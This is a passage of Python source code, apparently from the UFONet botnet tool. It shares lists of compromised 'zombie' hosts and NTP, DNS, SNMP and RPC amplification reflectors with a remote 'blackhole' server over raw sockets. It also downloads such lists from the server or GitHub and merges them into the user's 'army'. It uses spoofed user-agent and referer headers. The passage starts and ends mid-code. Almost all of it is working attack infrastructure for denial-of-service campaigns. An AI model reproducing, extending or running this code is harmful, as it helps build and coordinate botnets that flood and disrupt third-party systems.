fc.write(dns.strip()+"\n")
fc.close()
os.remove('botnet/warps.txt') # remove warps file
fc = gzip.open('botnet/community_snmps.txt.gz', 'wb')
for snmp in snmps_community:
fc.write(snmp.strip()+"\n")
fc.close()
os.remove('botnet/bosons.txt') # remove bosons file
print("[Info] [AI] Starting to upload new [Zombies]...\n")
try: # open a socket and send data to the blackhole reciever port
host = self.blackhole
cport = 9991
mport = 9990
try:
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data
cs.connect(host, cport)
cs.send("SEND " + 'community_zombies.txt.gz')
cs.close()
f = open('botnet/community_zombies.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_zombies.txt.gz') # remove local zombies .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cs.connect(host, cport)
cs.send("SEND " + 'community_aliens.txt.gz')
cs.close()
f = open('botnet/community_aliens.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_aliens.txt.gz') # remove local aliens .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cs.connect(host, cport)
cs.send("SEND " + 'community_robots.txt.gz')
cs.close()
f = open('botnet/community_droids.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_droids.txt.gz') # remove local droids .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cs.connect(host, cport)
cs.send("SEND " + 'community_ucavs.txt.gz')
cs.close()
f = open('botnet/community_ucavs.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_ucavs.txt.gz') # remove local ucavs .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
cs.connect(host, cport)
cs.send("SEND " + 'community_rpcs.txt.gz')
cs.close()
f = open('botnet/community_rpcs.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_rpcs.txt.gz') # remove local rpcs .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
cs.connect(host, cport)
cs.send("SEND " + 'community_ntps.txt.gz')
cs.close()
f = open('botnet/community_ntps.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_ntps.txt.gz') # remove local ntps .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
cs.connect(host, cport)
cs.send("SEND " + 'community_dnss.txt.gz')
cs.close()
f = open('botnet/community_dnss.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_dnss.txt.gz') # remove local dnss .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
cs.connect(host, cport)
cs.send("SEND " + 'community_snmps.txt.gz')
cs.close()
f = open('botnet/community_snmps.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_snmps.txt.gz') # remove local snmps .gz file after transfer
time.sleep(2) # sleep a bit more
print('-'*12 + '\n')
print("[Info] [AI] Transfer -> [DONE!]\n")
except Exception as e:
print(str(e) + "\n")
except:
print('-'*12 + '\n')
print("[Error] [AI] Connecting sockets to [Blackhole] -> [Aborting!]\n")
return
except:
print('-'*12 + '\n')
print("[Error] [AI] Unable to upload list of [Zombies] to this [Blackhole] -> [Exiting!]\n")
return
def update_gui_data(self):
# download all GUI stream data
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if self.options.proxy: # set proxy
self.proxy_transport(self.options.proxy)
if self.options.timeout: # set timeout
try:
timeout = int(self.options.timeout)
except:
timeout = 5
else:
timeout = 5
if timeout < 1:
timeout = 5
if self.options.forcessl:
news = urllib.request.Request('https://'+self.blackhole+'/ufonet/news.txt', None, headers)
news_reply = urllib.request.urlopen(news, context=self.ctx, timeout=timeout).read().decode('utf-8')
tv = urllib.request.Request('https://'+self.blackhole+'/ufonet/tv.txt', None, headers)
tv_reply = urllib.request.urlopen(tv, context=self.ctx, timeout=timeout).read().decode('utf-8')
missions = urllib.request.Request('https://'+self.blackhole+'/ufonet/missions.txt', None, headers)
missions_reply = urllib.request.urlopen(missions, context=self.ctx, timeout=timeout).read().decode('utf-8')
board = urllib.request.Request('https://'+self.blackhole+'/ufonet/board.txt', None, headers)
board_reply = urllib.request.urlopen(board, context=self.ctx, timeout=timeout).read().decode('utf-8')
grid = urllib.request.Request('https://'+self.blackhole+'/ufonet/grid.txt', None, headers)
grid_reply = urllib.request.urlopen(grid, context=self.ctx, timeout=timeout).read().decode('utf-8')
wargames = urllib.request.Request('https://'+self.blackhole+'/ufonet/wargames.txt', None, headers)
wargames_reply = urllib.request.urlopen(wargames, context=self.ctx, timeout=timeout).read().decode('utf-8')
links = urllib.request.Request('https://'+self.blackhole+'/ufonet/links.txt', None, headers)
links_reply = urllib.request.urlopen(links, context=self.ctx, timeout=timeout).read().decode('utf-8')
streams = urllib.request.Request('https://'+self.blackhole+'/ufonet/streams.txt', None, headers)
streams_reply = urllib.request.urlopen(streams, context=self.ctx, timeout=timeout).read().decode('utf-8')
globalnet = urllib.request.Request('https://'+self.blackhole+'/ufonet/globalnet.txt', None, headers)
globalnet_reply = urllib.request.urlopen(globalnet, context=self.ctx, timeout=timeout).read().decode('utf-8')
else:
news = urllib.request.Request('http://'+self.blackhole+'/ufonet/news.txt', None, headers)
news_reply = urllib.request.urlopen(news, context=self.ctx).read().decode('utf-8')
tv = urllib.request.Request('http://'+self.blackhole+'/ufonet/tv.txt', None, headers)
tv_reply = urllib.request.urlopen(tv, context=self.ctx).read().decode('utf-8')
missions = urllib.request.Request('http://'+self.blackhole+'/ufonet/missions.txt', None, headers)
missions_reply = urllib.request.urlopen(missions, context=self.ctx).read().decode('utf-8')
board = urllib.request.Request('http://'+self.blackhole+'/ufonet/board.txt', None, headers)
board_reply = urllib.request.urlopen(board, context=self.ctx).read().decode('utf-8')
grid = urllib.request.Request('http://'+self.blackhole+'/ufonet/grid.txt', None, headers)
grid_reply = urllib.request.urlopen(grid, context=self.ctx).read().decode('utf-8')
wargames = urllib.request.Request('http://'+self.blackhole+'/ufonet/wargames.txt', None, headers)
wargames_reply = urllib.request.urlopen(wargames, context=self.ctx).read().decode('utf-8')
links = urllib.request.Request('http://'+self.blackhole+'/ufonet/links.txt', None, headers)
links_reply = urllib.request.urlopen(links, context=self.ctx).read().decode('utf-8')
streams = urllib.request.Request('http://'+self.blackhole+'/ufonet/streams.txt', None, headers)
streams_reply = urllib.request.urlopen(streams, context=self.ctx).read().decode('utf-8')
globalnet = urllib.request.Request('http://'+self.blackhole+'/ufonet/globalnet.txt', None, headers)
globalnet_reply = urllib.request.urlopen(globalnet, context=self.ctx).read().decode('utf-8')
f = open(self.news_file, 'w')
f.write(news_reply)
f.close()
f = open(self.tv_file, 'w')
f.write(tv_reply)
f.close()
f = open(self.missions_file, 'w')
f.write(missions_reply)
f.close()
f = open(self.board_file, 'w')
f.write(board_reply)
f.close()
f = open(self.grid_file, 'w')
f.write(grid_reply)
f.close()
f = open(self.wargames_file, 'w')
f.write(wargames_reply)
f.close()
f = open(self.links_file, 'w')
f.write(links_reply)
f.close()
f = open(self.streams_file, 'w')
f.write(streams_reply)
f.close()
f = open(self.globalnet_file, 'w')
f.write(globalnet_reply)
f.close()
print('-'*25 + "\n")
print("[Info] [AI] GUI data correctly updated:\n")
if news_reply:
print("[Info] [AI] [News] : OK!")
if missions_reply:
print("[Info] [AI] [Missions] : OK!")
if board_reply:
print("[Info] [AI] [Board] : OK!")
if grid_reply:
print("[Info] [AI] [Grid] : OK!")
if wargames_reply:
print("[Info] [AI] [Wargames] : OK!")
if links_reply:
print("[Info] [AI] [Links] : OK!")
if streams_reply:
print("[Info] [AI] [Streams] : OK!")
if tv_reply:
print("[Info] [AI] [TV] : OK!")
if globalnet_reply:
print("[Info] [AI] [GlobalNet]: OK!")
print('-'*25)
print("\n[AI] "+self.exit_msg+"\n")
def downloading_list(self):
# add your mirror to protect/share/distribute... [Zombies]
try:
print(("[AI] Trying [Blackhole] [Server]: "+self.blackhole+"\n"))
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if self.options.timeout: # set timeout
try:
timeout = int(self.options.timeout)
except:
timeout = 5
else:
timeout = 5
if timeout < 1:
timeout = 5
if self.options.proxy: # set proxy
self.proxy_transport(self.options.proxy)
if self.options.forcessl:
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
abductions_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
abductions_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
troops_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
troops_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
robots_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
robots_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
drones_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
drones_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
reflectors_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
reflectors_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/crystals.txt.gz', None, headers)
crystals_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
crystals_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/warps.txt.gz', None, headers)
warps_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
warps_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/bosons.txt.gz', None, headers)
bosons_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
bosons_reply = ""
else:
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
abductions_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
abductions_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
troops_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
troops_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
robots_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
robots_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
drones_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
drones_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
reflectors_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
reflectors_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/crystals.txt.gz', None, headers)
crystals_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
crystals_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/warps.txt.gz', None, headers)
warps_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
warps_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/bosons.txt.gz', None, headers)
bosons_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
bosons_reply = ""
if abductions_reply == "" and troops_reply == "" and robots_reply == "" and drones_reply == "" and reflectors_reply == "" and crystals_reply == "" and warps_reply == "" and bosons_reply == "":
print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
print('-'*12 + '\n')
print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [Server] -> [Exiting!]\n")
return
f = open('botnet/abductions.txt.gz', 'wb')
f.write(abductions_reply)
f.close()
f = open('botnet/troops.txt.gz', 'wb')
f.write(troops_reply)
f.close()
f = open('botnet/robots.txt.gz', 'wb')
f.write(robots_reply)
f.close()
f = open('botnet/drones.txt.gz', 'wb')
f.write(drones_reply)
f.close()
f = open('botnet/reflectors.txt.gz', 'wb')
f.write(reflectors_reply)
f.close()
f = open('botnet/crystals.txt.gz', 'wb')
f.write(crystals_reply)
f.close()
f = open('botnet/warps.txt.gz', 'wb')
f.write(warps_reply)
f.close()
f = open('botnet/bosons.txt.gz', 'wb')
f.write(bosons_reply)
f.close()
print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX READY!] ;-)")
except:
print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
print('-'*12 + '\n')
print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [Server] -> [Exiting!]\n")
return
print('-'*12 + '\n')
f_in_abductions = gzip.open('botnet/abductions.txt.gz', 'rb')
f_out_abductions = open('botnet/abductions.txt', 'wb')
f_out_abductions.write(f_in_abductions.read())
f_in_abductions.close()
f_out_abductions.close()
os.remove('botnet/abductions.txt.gz') # remove abductions .gz file
f_in_troops = gzip.open('botnet/troops.txt.gz', 'rb')
f_out_troops = open('botnet/troops.txt', 'wb')
f_out_troops.write(f_in_troops.read())
f_in_troops.close()
f_out_troops.close()
os.remove('botnet/troops.txt.gz') # remove troops .gz file
f_in_robots = gzip.open('botnet/robots.txt.gz', 'rb')
f_out_robots = open('botnet/robots.txt', 'wb')
f_out_robots.write(f_in_robots.read())
f_in_robots.close()
f_out_robots.close()
os.remove('botnet/robots.txt.gz') # remove robots .gz file
f_in_drones = gzip.open('botnet/drones.txt.gz', 'rb')
f_out_drones = open('botnet/drones.txt', 'wb')
f_out_drones.write(f_in_drones.read())
f_in_drones.close()
f_out_drones.close()
os.remove('botnet/drones.txt.gz') # remove drones .gz file
f_in_reflectors = gzip.open('botnet/reflectors.txt.gz', 'rb')
f_out_reflectors = open('botnet/reflectors.txt', 'wb')
f_out_reflectors.write(f_in_reflectors.read())
f_in_reflectors.close()
f_out_reflectors.close()
os.remove('botnet/reflectors.txt.gz') # remove reflectors .gz file
f_in_crystals = gzip.open('botnet/crystals.txt.gz', 'rb')
f_out_crystals = open('botnet/crystals.txt', 'wb')
f_out_crystals.write(f_in_crystals.read())
f_in_crystals.close()
f_out_crystals.close()
os.remove('botnet/crystals.txt.gz') # remove crystals .gz file
f_in_warps = gzip.open('botnet/warps.txt.gz', 'rb')
f_out_warps = open('botnet/warps.txt', 'wb')
f_out_warps.write(f_in_warps.read())
f_in_warps.close()
f_out_warps.close()
os.remove('botnet/warps.txt.gz') # remove warps .gz file
f_in_bosons = gzip.open('botnet/bosons.txt.gz', 'rb')
f_out_bosons = open('botnet/bosons.txt', 'wb')
f_out_bosons.write(f_in_bosons.read())
f_in_bosons.close()
f_out_bosons.close()
os.remove('botnet/bosons.txt.gz') # remove bosons .gz file
num_abductions = 0
with open('botnet/abductions.txt') as f:
for _ in f:
num_abductions = num_abductions + 1
print("[Info] Zombies: " + str(num_abductions))
num_robots = 0
with open('botnet/robots.txt') as f:
for _ in f:
num_robots = num_robots + 1
print("[Info] Droids : " + str(num_robots))
num_troops = 0
with open('botnet/troops.txt') as f:
for _ in f:
num_troops = num_troops + 1
print("[Info] Aliens : " + str(num_troops))
num_drones = 0
with open('botnet/drones.txt') as f:
for _ in f:
num_drones = num_drones + 1
print("[Info] UCAVs : " + str(num_drones))
num_reflectors = 0
with open('botnet/reflectors.txt') as f:
for _ in f:
num_reflectors = num_reflectors + 1
print("[Info] X-RPCs : " + str(num_reflectors))
num_crystals = 0
with open('botnet/crystals.txt') as f:
for _ in f:
num_crystals = num_crystals + 1
print("[Info] DNSs : " + str(num_crystals))
num_warps = 0
with open('botnet/warps.txt') as f:
for _ in f:
num_warps = num_warps + 1
print("[Info] NTPs : " + str(num_warps))
num_bosons = 0
with open('botnet/bosons.txt') as f:
for _ in f:
num_bosons = num_bosons + 1
print("[Info] SNMPs : " + str(num_bosons))
total_zombies = num_abductions + num_troops + num_crystals + num_robots + num_drones + num_reflectors + num_warps + num_bosons
print("\n[Info] [AI] Congratulations!. Total downloaded: " + str(total_zombies))
print('-'*12)
if not self.options.forceyes:
update_reply = input("\n[AI] Do you want to merge ONLY the new 'troops' into your army? (Y/n)")
print('-'*25)
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
os.remove('botnet/abductions.txt') # remove abductions file
os.remove('botnet/troops.txt') # remove troops file
os.remove('botnet/robots.txt') # remove robots file
os.remove('botnet/drones.txt') # remove drones file
os.remove('botnet/reflectors.txt') # remove reflectors file
os.remove('botnet/crystals.txt') # remove crystals file
os.remove('botnet/warps.txt') # remove warps file
os.remove('botnet/bosons.txt') # remove bosons file
print("\n[Info] [AI] [Control] Temporal list downloaded has been removed! -> [Exiting!]")
print('-'*25)
print("\n[AI] "+self.exit_msg+"\n")
else:
zombies_ready = []
f = open('botnet/abductions.txt')
abductions = f.readlines()
f.close()
fz = open(self.zombies_file)
zombies = fz.readlines()
fz.close()
for abduction in abductions:
abduction = abduction.replace('\n','')
if abduction not in zombies:
zombies_ready.append(abduction)
else:
pass
self.update_zombies(zombies_ready)
os.remove('botnet/abductions.txt') # remove abductions .txt file
aliens_ready = []
f = open('botnet/troops.txt')
troops = f.readlines()
f.close()
fz = open(self.aliens_file)
aliens = fz.readlines()
fz.close()
for alien in troops:
alien = alien.replace('\n','')
if alien not in aliens:
aliens_ready.append(alien)
else:
pass
self.update_aliens(aliens_ready)
os.remove('botnet/troops.txt') # remove troops .txt file
droids_ready = []
f = open('botnet/robots.txt')
robots = f.readlines()
f.close()
fz = open(self.droids_file)
droids = fz.readlines()
fz.close()
for droid in robots:
droid = droid.replace('\n','')
if droid not in droids:
droids_ready.append(droid)
else:
pass
self.update_droids(droids_ready)
os.remove('botnet/robots.txt') # remove robots .txt file
ucavs_ready = []
f = open('botnet/drones.txt')
drones = f.readlines()
f.close()
fz = open(self.ucavs_file)
ucavs = fz.readlines()
fz.close()
for drone in drones:
drone = drone.replace('\n','')
if drone not in ucavs:
ucavs_ready.append(drone)
else:
pass
self.update_ucavs(ucavs_ready)
os.remove('botnet/drones.txt') # remove drones .txt file
rpcs_ready = []
f = open('botnet/reflectors.txt')
reflectors = f.readlines()
f.close()
fz = open(self.rpcs_file)
rpcs = fz.readlines()
fz.close()
for reflector in reflectors:
reflector = reflector.replace('\n','')
if reflector not in rpcs:
rpcs_ready.append(reflector)
else:
pass
self.update_rpcs(rpcs_ready)
os.remove('botnet/reflectors.txt') # remove reflectors .txt file
dnss_ready = []
f = open('botnet/crystals.txt')
crystals = f.readlines()
f.close()
fz = open(self.dnss_file)
dnss = fz.readlines()
fz.close()
for crystal in crystals:
crystal = crystal.replace('\n','')
if crystal not in dnss:
dnss_ready.append(crystal)
else:
pass
self.update_dnss(dnss_ready)
os.remove('botnet/crystals.txt') # remove crystals .txt file
ntps_ready = []
f = open('botnet/warps.txt')
warps = f.readlines()
f.close()
fz = open(self.ntps_file)
ntps = fz.readlines()
fz.close()
for warp in warps:
warp = warp.replace('\n','')
if warp not in ntps:
ntps_ready.append(warp)
else:
pass
self.update_ntps(ntps_ready)
os.remove('botnet/warps.txt') # remove warps .txt file
snmps_ready = []
f = open('botnet/bosons.txt')
bosons = f.readlines()
f.close()
fz = open(self.snmps_file)
snmps = fz.readlines()
fz.close()
for boson in bosons:
boson = boson.replace('\n','')
if boson not in snmps:
snmps_ready.append(boson)
else:
pass
self.update_snmps(snmps_ready)
os.remove('botnet/bosons.txt') # remove bosons .txt file
print("\n[Info] [AI] Botnet updated! -> ;-)")
self.update_transferred_stats(self.trans_zombies) # update json file with transferred stats (blackhole)
if not self.options.forceyes: # ask for update everything
print('-'*25 + "\n")
update_reply = input("[AI] You would also like to update other content: [News] [Missions] [Grid] [Board]... (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
print("\n[AI] "+self.exit_msg+"\n")
return
else:
try:
update_gui = self.update_gui_data() # update GUI data
except:
print('-'*25 +"\n")
print("[Error] [AI] Something wrong downloading GUI content! -> [Aborting!]")
print('-'*25)
print("\n[AI] "+self.exit_msg+"\n")
return
def downloading_github_list(self):
# add your mirror to protect/share/distribute... [Zombies]
try:
print(("[AI] Trying [Blackhole] [GitHub]: "+self.github_zombies+"\n"))
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if self.options.timeout: # set timeout
try:
timeout = int(self.options.timeout)
except:
timeout = 5
else:
timeout = 5
if timeout < 1:
timeout = 5
if self.options.proxy: # set proxy
self.proxy_transport(self.options.proxy)
try:
req = urllib.request.Request(self.github_zombies+'zombies.txt', None, headers)
zombies_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
zombies_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'aliens.txt', None, headers)
aliens_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
aliens_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'dns.txt', None, headers)
dns_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
dns_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'droids.txt', None, headers)
droids_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
droids_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'rpcs.txt', None, headers)
rpcs_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
rpcs_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'ucavs.txt', None, headers)
ucavs_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
ucavs_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'ntp.txt', None, headers)
ntp_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
ntp_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'snmp.txt', None, headers)
snmp_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
snmp_reply = ""
if zombies_reply == "" and aliens_reply == "" and dns_reply == "" and droids_reply == "" and rpcs_reply == "" and ucavs_reply == "" and ntp_reply == "" and snmp_reply == "":
print("[AI] [Control] [Blackhole] [GitHub] Reply: [VORTEX FAILED!]")
print('-'*12 + '\n')
print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [GitHub] -> [Exiting!]\n")
return
f = open('botnet/abductions.txt', 'w') # zombies
f.write(zombies_reply)
f.close()
f = open('botnet/troops.txt', 'w') # aliens
f.write(aliens_reply)
f.close()
f = open('botnet/crystals.txt', 'w') # dns
f.write(dns_reply)
f.close()
f = open('botnet/robots.txt', 'w') # droids
f.write(droids_reply)
f.close()
f = open('botnet/drones.txt', 'w') # ucavs
f.write(ucavs_reply)
f.close()
f = open('botnet/reflectors.txt', 'w') # rpcs
f.write(rpcs_reply)
f.close()
f = open('botnet/warps.txt', 'w') # ntp
f.write(ntp_reply)
f.close()
f = open('botnet/bosons.txt', 'w') # snmp
f.write(snmp_reply)
f.close()
print("[AI] [Control] [Blackhole] [GitHub] Reply: [VORTEX READY!] ;-)")
except:
print("[AI] [Control] [Blackhole] [GitHub] Reply: [VORTEX FAILED!]")
print('-'*12 + '\n')
print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [GitHub] -> [Exiting!]\n")
return
print('-'*12 + '\n')
num_abductions = 0
with open('botnet/abductions.txt') as f: # zombies
for _ in f:
num_abductions = num_abductions + 1
print("[Info] Zombies: " + str(num_abductions))
num_troops = 0
with open('botnet/troops.txt') as f: # aliens
for _ in f:
num_troops = num_troops + 1
print("[Info] Aliens : " + str(num_troops))
num_robots = 0
with open('botnet/robots.txt') as f: # droids
for _ in f:
num_robots = num_robots + 1
print("[Info] Droids : " + str(num_robots))
num_drones = 0
with open('botnet/drones.txt') as f: # ucavs
for _ in f:
num_drones = num_drones + 1
print("[Info] UCAVs : " + str(num_drones))
num_reflectors = 0
with open('botnet/reflectors.txt') as f: # rpcs
for _ in f:
num_reflectors = num_reflectors + 1
print("[Info] X-RPCs : " + str(num_reflectors))
num_crystals = 0
with open('botnet/crystals.txt') as f: # dns
for _ in f:
num_crystals = num_crystals + 1
print("[Info] DNSs : " + str(num_crystals))
num_warps = 0
with open('botnet/warps.txt') as f: # ntp
for _ in f:
num_warps = num_warps + 1
print("[Info] NTPs : " + str(num_warps))
num_bosons = 0
with open('botnet/bosons.txt') as f: # snmp
for _ in f:
num_bosons = num_bosons + 1
print("[Info] SNMPs : " + str(num_bosons))
total_zombies = num_abductions + num_troops + num_crystals + num_robots + num_drones + num_reflectors + num_warps + num_bosons
print("\n[Info] [AI] Congratulations!. Total downloaded: " + str(total_zombies))
print('-'*12)
if not self.options.forceyes:
update_reply = input("\n[AI] Do you want to merge ONLY the new 'troops' into your army? (Y/n)")
print('-'*25)
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
os.remove('botnet/abductions.txt') # remove zombies/abductions file
os.remove('botnet/troops.txt') # remove aliens/troops file
os.remove('botnet/crystals.txt') # remove dns/crystals file
os.remove('botnet/robots.txt') # remove droids/robots file
os.remove('botnet/drones.txt') # remove ucavs/drones file
os.remove('botnet/reflectors.txt') # remove rpcs/reflectors file
os.remove('botnet/warps.txt') # remove ntp/warps file
os.remove('botnet/bosons.txt') # remove snmp/bosons file
print("\n[Info] [AI] [Control] Temporal list downloaded has been removed! -> [Exiting!]")
print('-'*25)
print("\n[AI] "+self.exit_msg+"\n")
else:
zombies_ready = []
f = open('botnet/abductions.txt')
abductions = f.readlines()
f.close()
fz = open(self.zombies_file)
zombies = fz.readlines()
fz.close()
for abduction in abductions:
abduction = abduction.replace('\n','')
if abduction not in zombies:
zombies_ready.append(abduction)
else:
pass
self.update_zombies(zombies_ready)
os.remove('botnet/abductions.txt') # remove zombies/abductions file
aliens_ready = []
f = open('botnet/troops.txt')
troops = f.readlines()
f.close()
fz = open(self.aliens_file)
aliens = fz.readlines()
fz.close()
for alien in troops:
alien = alien.replace('\n','')
if alien not in aliens:
aliens_ready.append(alien)
else:
pass
self.update_aliens(aliens_ready)
os.remove('botnet/troops.txt') # remove aliens/troops file
dnss_ready = []
f = open('botnet/crystals.txt')
crystals = f.readlines()
f.close()
fz = open(self.dnss_file)
dnss = fz.readlines()
fz.close()
for crystal in crystals:
crystal = crystal.replace('\n','')
if crystal not in dnss:
dnss_ready.append(crystal)
else:
pass
self.update_dnss(dnss_ready)
os.remove('botnet/crystals.txt') # remove dns/crystals file
droids_ready = []
f = open('botnet/robots.txt')
robots = f.readlines()
f.close()
fz = open(self.droids_file)
droids = fz.readlines()
fz.close()
for droid in robots:
droid = droid.replace('\n','')
if droid not in droids:
droids_ready.append(droid)
else:
pass
self.update_droids(droids_ready)
os.remove('botnet/robots.txt') # remove droids/robots file
ucavs_ready = []
f = open('botnet/drones.txt')
drones = f.readlines()
f.close()
fz = open(self.ucavs_file)
ucavs = fz.readlines()
fz.close()
for drone in drones:
drone = drone.replace('\n','')
if drone not in ucavs:
ucavs_ready.append(drone)
else:
pass
self.update_ucavs(ucavs_ready)
os.remove('botnet/drones.txt') # remove UCAVs/drones file
rpcs_ready = []
f = open('botnet/reflectors.txt')
reflectors = f.readlines()
f.close()
fz = open(self.rpcs_file)
rpcs = fz.readlines()
fz.close()
for reflector in reflectors:
reflector = reflector.replace('\n','')
if reflector not in rpcs:
rpcs_ready.append(reflector)
else:
pass
self.update_rpcs(rpcs_ready)
os.remove('botnet/reflectors.txt') # remove RPCs/reflectors file
ntps_ready = []
f = open('botnet/warps.txt')
warps = f.readlines()
f.close()
fz = open(self.ntps_file)
ntps = fz.readlines()
fz.close()
for warp in warps:
warp = warp.replace('\n','')
if warp not in ntps:
ntps_ready.append(warp)
else:
pass
self.update_ntps(ntps_ready)
os.remove('botnet/warps.txt') # remove NTP/warps file
snmps_ready = []
f = open('botnet/bosons.txt')
bosons = f.readlines()
f.close()
fz = open(self.snmps_file)
snmps = fz.readlines()
fz.close()
for boson in bosons:
boson = boson.replace('\n','')
if boson not in snmps:
snmps_ready.append(boson)
else:
pass
self.update_snmps(snmps_ready)
os.remove('botnet/bosons.txt') # remove SNMP/bosons file
print("\n[Info] [AI] Botnet updated! -> ;-)")
self.update_transferred_stats(self.trans_zombies) # update json file with transferred stats (blackhole)
if not self.options.forceyes: # ask for update everything
print('-'*25 + "\n")
